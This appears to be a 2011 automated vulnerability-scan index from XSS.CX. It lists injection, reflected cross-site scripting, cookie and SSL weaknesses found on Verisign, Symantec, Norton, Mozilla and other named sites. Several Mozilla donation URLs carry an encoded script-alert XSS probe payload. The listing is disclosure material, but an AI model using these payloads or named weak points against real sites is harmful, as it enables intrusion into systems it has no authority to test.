XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09092011-01

Report generated by XSS.CX at Sat Sep 10 00:40:28 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. LDAP injection

1.1. https://onlinefamily.norton.com/familysafety/basicpremium.fs [REST URL parameter 2]

1.2. http://player.ooyala.com/player.js [height parameter]

1.3. http://sales.liveperson.net/hc/2735064/ [PV%21pageLoadTime parameter]

1.4. http://sales.liveperson.net/hc/2735064/ [SV%21language parameter]

1.5. http://sales.liveperson.net/hc/2735064/ [defInvite parameter]

1.6. http://sales.liveperson.net/hc/2735064/ [lpCallId parameter]

1.7. http://sales.liveperson.net/hc/71097838/ [HumanClickACTIVE cookie]

1.8. http://sales.liveperson.net/hc/71097838/ [HumanClickSiteContainerID_71097838 cookie]

1.9. http://sales.liveperson.net/hc/71097838/ [lpCallId parameter]

1.10. http://sales.liveperson.net/hc/71097838/ [protV parameter]

1.11. http://sales.liveperson.net/hc/71097838/ [t parameter]

1.12. http://sales.liveperson.net/hc/71097838/ [timeout parameter]

2. HTTP header injection

2.1. https://idprotect.verisign.com/toolbar/activate.v [REST URL parameter 2]

2.2. https://idprotect.verisign.com/toolbar/download.v [REST URL parameter 2]

2.3. https://idprotect.verisign.com/toolbar/downloadIE.v [REST URL parameter 2]

2.4. https://idprotect.verisign.com/toolbar/home.v [REST URL parameter 2]

2.5. https://idprotect.verisign.com/toolbar/install.v [REST URL parameter 2]

3. Cross-site scripting (reflected)

3.1. https://cert.webtrust.org/ViewSeal [id parameter]

3.2. http://com-verisign.netmng.com/ [height parameter]

3.3. http://com-verisign.netmng.com/ [width parameter]

3.4. https://donate.mozilla.org/favicon.ico [REST URL parameter 1]

3.5. https://donate.mozilla.org/favicon.ico [name of an arbitrarily supplied request parameter]

3.6. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 1]

3.7. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 2]

3.8. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 3]

3.9. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4]

3.10. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter]

3.11. https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter]

3.12. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter]

3.13. http://free.pctools.com/favicon.ico [REST URL parameter 1]

3.14. http://free.pctools.com/free-antivirus/ [REST URL parameter 1]

3.15. http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter]

3.16. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]

3.17. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]

3.18. https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter]

3.19. https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter]

3.20. https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter]

3.21. http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter]

3.22. http://player.ooyala.com/player.js [playerId parameter]

3.23. http://player.ooyala.com/player.js [wmode parameter]

3.24. https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter]

3.25. https://renewals.symantec.com/renewals/application [entry_point parameter]

3.26. http://updatecenter.norton.com/ [NUCLANG parameter]

3.27. http://www.symantec.com/business/verisign/fraud-detection-service [tid parameter]

3.28. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 2]

3.29. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 3]

3.30. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 4]

3.31. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 5]

3.32. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 6]

3.33. http://www.symantec.com/connect/sites/default/themes/connect2/images/favicon.ico [REST URL parameter 7]

3.34. http://www.symantec.com/s/searchg/suggest [q parameter]

3.35. https://cert.webtrust.org/ViewSeal [Referer HTTP header]

4. Flash cross-domain policy

4.1. http://ak.c.ooyala.com/crossdomain.xml

4.2. http://cp76677.edgefcs.net/crossdomain.xml

4.3. http://mbox3.offermatica.com/crossdomain.xml

4.4. http://om.symantec.com/crossdomain.xml

4.5. http://player.ooyala.com/crossdomain.xml

4.6. https://symantec-corporation.com/crossdomain.xml

4.7. http://symantec.tt.omtrdc.net/crossdomain.xml

4.8. http://ch.norton.com/crossdomain.xml

4.9. http://l.player.ooyala.com/crossdomain.xml

4.10. http://us.norton.com/crossdomain.xml

4.11. https://us.norton.com/crossdomain.xml

4.12. https://www-secure.symantec.com/crossdomain.xml

4.13. http://www.symantec.com/crossdomain.xml

4.14. http://1168.ic-live.com/crossdomain.xml

4.15. https://drh.img.digitalriver.com/crossdomain.xml

4.16. http://twitter.com/crossdomain.xml

4.17. http://www.verisign.com/crossdomain.xml

4.18. https://www.verisign.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://om.symantec.com/clientaccesspolicy.xml

5.2. http://player.ooyala.com/clientaccesspolicy.xml

6. SSL cookie without secure flag set

6.1. https://admin.instantservice.com/Customer

6.2. https://admin.instantservice.com/links/5851/14753

6.3. https://admin.instantservice.com/links/5851/16144

6.4. https://admin.instantservice.com/links/5851/16145

6.5. https://admin.instantservice.com/links/5851/39897

6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs

6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch

6.8. https://securitycenter.verisign.com/celp/enroll/retail

6.9. https://securitycenter.verisign.com/celp/enroll/upsell

6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs

6.11. https://renewals.symantec.com/renewals/application

6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login

6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial

6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login

6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial

6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial

6.17. https://trust-center.verisign.ch/process/retail/console_login

6.18. https://trust-center.verisign.ch/process/retail/trust_initial

6.19. https://trust-center.verisign.com/favicon.ico

6.20. https://trust-center.verisign.com/process/retail/console_login

6.21. https://trust-center.verisign.com/process/retail/help_and_support

6.22. https://trust-center.verisign.com/process/retail/redirect

6.23. https://trust-center.verisign.com/process/retail/session_timeout

6.24. https://trust-center.verisign.com/process/retail/trust_initial

6.25. https://trust-center.verisign.com/process/retail/trust_product_selector

6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do

6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif

6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif

6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif

6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif

6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif

6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif

6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif

6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif

6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif

6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif

6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif

6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg

6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif

6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif

6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg

6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif

6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js

6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js

6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js

6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js

6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js

6.49. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js

6.50. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js

6.51. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js

6.52. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js

6.53. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js

6.54. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js

6.55. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js

6.56. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

6.57. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js

6.58. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js

6.59. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js

6.60. https://trust-center.verisign.com/rcm/verisign/style/brand.css

6.61. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css

6.62. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css

6.63. https://trust-center.verisign.com/rcm/verisign/style/module.css

6.64. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css

6.65. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css

6.66. https://www.verisign.com/assets/visual-sciences/vip/zig.js

6.67. https://www4.symantec.com/Vrt/wl

7. Session token in URL

7.1. https://idprotect.verisign.com/images/favicon.ico

7.2. https://idprotect.verisign.com/kaptcha.jpg

7.3. https://idprotect.verisign.com/scripts/global.js

7.4. https://idprotect.verisign.com/toolbar/activate.v

7.5. http://m.verisign.com/home.v

7.6. http://mbox3.offermatica.com/m2/verisign/mbox/standard

7.7. http://mbox3.offermatica.com/m2/verisign/ubox/image

7.8. http://player.ooyala.com/sas/authorized

7.9. https://renewals.symantec.com/renewals/images/icon-pop-up.gif

7.10. http://sales.liveperson.net/hc/2735064/

7.11. https://securitycenter.verisign.com/celp/enroll/retail

7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard

7.13. https://trust-center.verisign.com/process/retail/trust_product_selector

7.14. http://vipmobile.verisign.com/images/favicon.ico

7.15. https://vipmobile.verisign.com/home.v

8. SSL certificate

8.1. https://fileconnect.symantec.com/

8.2. https://forms.verisign.com/

8.3. https://knowledge.verisign.ch/

8.4. https://knowledge.verisign.com/

8.5. https://onlinefamily.norton.com/

8.6. https://query.verisign.com/

8.7. https://ssl-certificate-center.verisign.ch/

8.8. https://ssl-certificate-center.verisign.com/

8.9. https://trust-center.verisign.ch/

8.10. https://trust-center.verisign.com/

8.11. https://us.norton.com/

8.12. https://admin.instantservice.com/

8.13. https://buy-static.norton.com/

8.14. https://cdn.verisign.com/

8.15. https://cert.webtrust.org/

8.16. https://donate.mozilla.org/

8.17. https://drh.img.digitalriver.com/

8.18. https://enterprise-ssl-admin.verisign.com/

8.19. https://idprotect.verisign.com/

8.20. https://partnernet.symantec.com/

8.21. https://policy3.responsys.net/

8.22. https://press.verisign.com/

8.23. https://products.geotrust.com/

8.24. https://products.verisign.com/

8.25. https://renewals.symantec.com/

8.26. https://seal.verisign.com/

8.27. https://securitycenter.verisign.com/

8.28. https://symaccount.symantec.com/

8.29. https://symantec-corporation.com/

8.30. https://test-products.verisign.com/

8.31. https://vipdeveloper.verisign.com/

8.32. https://vipmanager.verisign.com/

8.33. https://vipmobile.verisign.com/

8.34. https://vs.symantec.com/

8.35. https://www-secure.symantec.com/

8.36. https://www.verisign.com/

8.37. https://www4.symantec.com/

9. Cookie scoped to parent domain

9.1. http://buy.norton.com/

9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

9.6. http://buy.norton.com/estore/mf/landingProductFeatures

9.7. http://buy.norton.com/estore/mf/landingPromotion

9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

9.10. http://buy.norton.com/estore/mf/upgradeCenter

9.11. http://buy.norton.com/estore/mf/upgradeRenewal

9.12. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

9.13. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

9.14. http://mbox3.offermatica.com/m2/verisign/mbox/standard

9.15. http://buy.norton.com/

9.16. http://buy.norton.com/ps

9.17. http://buy.norton.com/special-promotions

9.18. http://buy.norton.com/support

9.19. http://buy.norton.com/upgrades-renewals

9.20. http://buy.symanteccloud.com/freetrial

9.21. http://buy.symanteccloud.com/smbstore

9.22. http://free.pctools.com/res/js/utils.php

9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard

9.24. http://sales.liveperson.net/hc/2735064/

9.25. http://sales.liveperson.net/hc/71097838/

9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login

9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial

9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login

9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial

9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial

9.31. https://trust-center.verisign.ch/process/retail/console_login

9.32. https://trust-center.verisign.ch/process/retail/trust_initial

9.33. https://trust-center.verisign.com/favicon.ico

9.34. https://trust-center.verisign.com/process/retail/console_login

9.35. https://trust-center.verisign.com/process/retail/help_and_support

9.36. https://trust-center.verisign.com/process/retail/redirect

9.37. https://trust-center.verisign.com/process/retail/session_timeout

9.38. https://trust-center.verisign.com/process/retail/trust_initial

9.39. https://trust-center.verisign.com/process/retail/trust_product_selector

9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do

9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif

9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif

9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif

9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif

9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif

9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif

9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif

9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif

9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif

9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif

9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif

9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg

9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif

9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif

9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg

9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif

9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js

9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js

9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js

9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js

9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js

9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js

9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js

9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js

9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js

9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js

9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js

9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js

9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js

9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js

9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js

9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css

9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css

9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css

9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css

9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css

9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css

9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif

9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif

9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js

10. Cookie without HttpOnly flag set

10.1. https://admin.instantservice.com/Customer

10.2. https://admin.instantservice.com/links/5851/14753

10.3. https://admin.instantservice.com/links/5851/16144

10.4. https://admin.instantservice.com/links/5851/16145

10.5. https://admin.instantservice.com/links/5851/39897

10.6. http://buy.norton.com/

10.7. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

10.8. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

10.9. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

10.10. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

10.11. http://buy.norton.com/estore/mf/landingProductFeatures

10.12. http://buy.norton.com/estore/mf/landingPromotion

10.13. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

10.14. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

10.15. http://buy.norton.com/estore/mf/upgradeCenter

10.16. http://buy.norton.com/estore/mf/upgradeRenewal

10.17. http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/

10.18. http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/

10.19. http://buy.norton.com/upgrades-renewals

10.20. https://idprotect.verisign.com/toolbar/activate.v

10.21. http://m.verisign.com/

10.22. http://mbox3.offermatica.com/m2/verisign/mbox/standard

10.23. https://onlinefamily.norton.com/familysafety/loginStart.fs

10.24. https://products.verisign.com/geocenter/reseller/doregister.do

10.25. https://products.verisign.com/geocenter/reseller/logon.do

10.26. https://products.verisign.com/geocenter/reseller/register.do

10.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch

10.28. https://securitycenter.verisign.com/celp/enroll/retail

10.29. https://securitycenter.verisign.com/celp/enroll/upsell

10.30. https://trust-center.verisign.com/process/retail/session_timeout

10.31. http://us.norton.com/beta/index.jsp

10.32. http://us.norton.com/beta/overview.jsp

10.33. http://vipmobile.verisign.com/fpa/fpa.jsp

10.34. http://vipmobile.verisign.com/images/b_shadow.png

10.35. http://vipmobile.verisign.com/images/bl_shadow.png

10.36. http://vipmobile.verisign.com/images/br_shadow.png

10.37. http://vipmobile.verisign.com/images/dot.gif

10.38. http://vipmobile.verisign.com/images/home_rght_box.gif

10.39. http://vipmobile.verisign.com/images/r_shadow.png

10.40. http://vipmobile.verisign.com/images/rt_shadow.png

10.41. http://vipmobile.verisign.com/images/topleft.gif

10.42. https://vipmobile.verisign.com/fpa/fpa.jsp

10.43. http://buy.norton.com/

10.44. http://buy.norton.com/ps

10.45. http://buy.norton.com/special-promotions

10.46. http://buy.norton.com/support

10.47. http://buy.symanteccloud.com/freetrial

10.48. http://buy.symanteccloud.com/smbstore

10.49. http://com-verisign.netmng.com/

10.50. http://com-verisign.netmng.com//

10.51. http://free.pctools.com/res/js/utils.php

10.52. http://mbox3.offermatica.com/m2/verisign/mbox/standard

10.53. https://onlinefamily.norton.com/familysafety/basicpremium.fs

10.54. http://renewals.symantec.com/renewals/application

10.55. https://renewals.symantec.com/renewals/application

10.56. http://sales.liveperson.net/hc/2735064/

10.57. http://sales.liveperson.net/hc/2735064/

10.58. http://sales.liveperson.net/hc/2735064/

10.59. http://sales.liveperson.net/hc/71097838/

10.60. http://sales.liveperson.net/hc/71097838/

10.61. http://sales.liveperson.net/hc/71097838/

10.62. https://ssl-certificate-center.verisign.ch/process/retail/console_login

10.63. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial

10.64. https://ssl-certificate-center.verisign.com/process/retail/console_login

10.65. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial

10.66. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial

10.67. https://trust-center.verisign.ch/process/retail/console_login

10.68. https://trust-center.verisign.ch/process/retail/trust_initial

10.69. https://trust-center.verisign.com/favicon.ico

10.70. https://trust-center.verisign.com/process/retail/console_login

10.71. https://trust-center.verisign.com/process/retail/help_and_support

10.72. https://trust-center.verisign.com/process/retail/redirect

10.73. https://trust-center.verisign.com/process/retail/trust_initial

10.74. https://trust-center.verisign.com/process/retail/trust_product_selector

10.75. https://trust-center.verisign.com/process/retail/trust_product_selector.do

10.76. https://trust-center.verisign.com/rcm/TeaLeafTarget.html

10.77. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif

10.78. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif

10.79. https://trust-center.verisign.com/rcm/verisign/images/divider.gif

10.80. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif

10.81. https://trust-center.verisign.com/rcm/verisign/images/logo.gif

10.82. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif

10.83. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif

10.84. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif

10.85. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif

10.86. https://trust-center.verisign.com/rcm/verisign/images/truste.gif

10.87. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif

10.88. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg

10.89. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif

10.90. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif

10.91. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg

10.92. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif

10.93. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js

10.94. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js

10.95. https://trust-center.verisign.com/rcm/verisign/scripts/default.js

10.96. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js

10.97. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js

10.98. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js

10.99. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js

10.100. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js

10.101. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js

10.102. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js

10.103. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js

10.104. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js

10.105. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

10.106. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js

10.107. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js

10.108. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js

10.109. https://trust-center.verisign.com/rcm/verisign/style/brand.css

10.110. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css

10.111. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css

10.112. https://trust-center.verisign.com/rcm/verisign/style/module.css

10.113. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css

10.114. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css

10.115. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif

10.116. http://www.verisign.co.uk/hp07/i/vlogo.gif

10.117. https://www.verisign.com/assets/visual-sciences/vip/zig.js

10.118. https://www4.symantec.com/Vrt/wl

11. Password field with autocomplete enabled

11.1. http://blogs.verisign.com/

11.2. https://knowledge.verisign.ch/support/code-signing-support/index.html

11.3. https://knowledge.verisign.ch/support/digital-id-support/index.html

11.4. https://knowledge.verisign.ch/support/mpki-support/index.html

11.5. https://knowledge.verisign.ch/support/ssl-certificates-support/index

11.6. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

11.7. https://knowledge.verisign.ch/support/trust-seal-support/index.html

11.8. https://knowledge.verisign.com/support/code-signing-support/index

11.9. https://knowledge.verisign.com/support/code-signing-support/index.html

11.10. https://knowledge.verisign.com/support/digital-id-support/index.html

11.11. https://knowledge.verisign.com/support/eca-support/index.html

11.12. https://knowledge.verisign.com/support/mpki-for-ssl-support/index

11.13. https://knowledge.verisign.com/support/mpki-for-ssl-support/index.html

11.14. https://knowledge.verisign.com/support/mpki-support/index.html

11.15. https://knowledge.verisign.com/support/ssl-certificates-support/index

11.16. https://knowledge.verisign.com/support/ssl-certificates-support/index.html

11.17. https://knowledge.verisign.com/support/trust-seal-support/index.html

11.18. https://products.verisign.com/geocenter/reseller/logon.do

11.19. https://products.verisign.com/geocenter/reseller/logon.jsp

11.20. https://products.verisign.com/geocenter/reseller/register.do

11.21. http://query.verisign.ch/search

11.22. http://query.verisign.com/search

11.23. https://query.verisign.com/search

11.24. https://ssl-certificate-center.verisign.ch/process/retail/console_login

11.25. https://ssl-certificate-center.verisign.com/process/retail/console_login

11.26. https://test-products.verisign.com/geocenter/reseller/logon.do

11.27. https://trust-center.verisign.ch/process/retail/console_login

11.28. https://trust-center.verisign.com/process/retail/console_login

11.29. http://www.verisign.ch/

11.30. http://www.verisign.ch/contact-information/index.html

11.31. http://www.verisign.ch/corporate/index.html

11.32. http://www.verisign.ch/trust-seal/index.html

11.33. http://www.verisign.com/

11.34. http://www.verisign.com/assets/trust-seal/images/FreeTrialButton-hover.png,/assets/trust-seal/images/BuyButton-hover.png,/assets/trust-seal/images/omer-png8.png,/assets/trust-seal/images/hadleigh-png8.png,/assets/trust-seal/images/diane-png8.png,/assets/trust-seal/images/matthew-png8.png

11.35. http://www.verisign.com/code-signing/index.html

11.36. http://www.verisign.com/partners/ssl-reseller-programs/index.html

11.37. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

11.38. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html

11.39. http://www.verisign.com/ssl/buy-ssl-certificates/index.html

11.40. http://www.verisign.com/trust-seal/index.html

11.41. http://www.verisign.com/verisign-worldwide/index.html

11.42. https://www.verisign.com/

11.43. https://www.verisign.com/products-services/index.html

12. Referer-dependent response

12.1. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_red.png

12.2. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/arrow_white.png

12.3. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png

12.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png

12.5. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_left.png

12.6. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_right.png

12.7. http://sales.liveperson.net/hc/2735064/

13. Cross-domain POST

